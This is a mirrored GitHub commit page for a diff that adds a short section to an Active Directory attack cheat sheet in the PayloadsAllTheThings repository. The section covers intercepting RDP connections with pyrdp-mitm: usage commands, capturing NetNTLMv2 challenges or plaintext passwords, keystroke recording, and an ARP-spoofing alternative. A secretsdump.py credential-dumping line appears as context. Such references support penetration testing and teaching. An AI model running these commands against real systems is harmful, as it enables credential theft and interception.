mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Merge pull request #572 from sebch-/patch-3
Update Active Directory Attack.md
This commit is contained in:
commit
31363e016b
1 changed files with 15 additions and 0 deletions
|
@ -2219,6 +2219,21 @@ secretsdump.py -k -no-pass target.lab.local
|
|||
# IP of PC1: 10.0.0.4
|
||||
```
|
||||
|
||||
#### Man-in-the-middle RDP connections with pyrdp-mitm
|
||||
* https://github.com/GoSecure/pyrdp
|
||||
* https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/
|
||||
* Usage
|
||||
```sh
|
||||
pyrdp-mitm.py <IP>
|
||||
pyrdp-mitp.py <IP>:<PORT> # with custom port
|
||||
pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and certificate
|
||||
```
|
||||
* Exploitation
|
||||
* If Network Level Authentication (NLA) is enabled, you will obtain the client's NetNTLMv2 challenge
|
||||
* If NLA is disabled, you will obtain the password in plaintext
|
||||
* Other features are available such as keystroke recording
|
||||
* Alternatives
|
||||
* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener
|
||||
|
||||
### Active Directory Certificate Services
|
||||
|
||||
|
|
Loading…
Reference in a new issue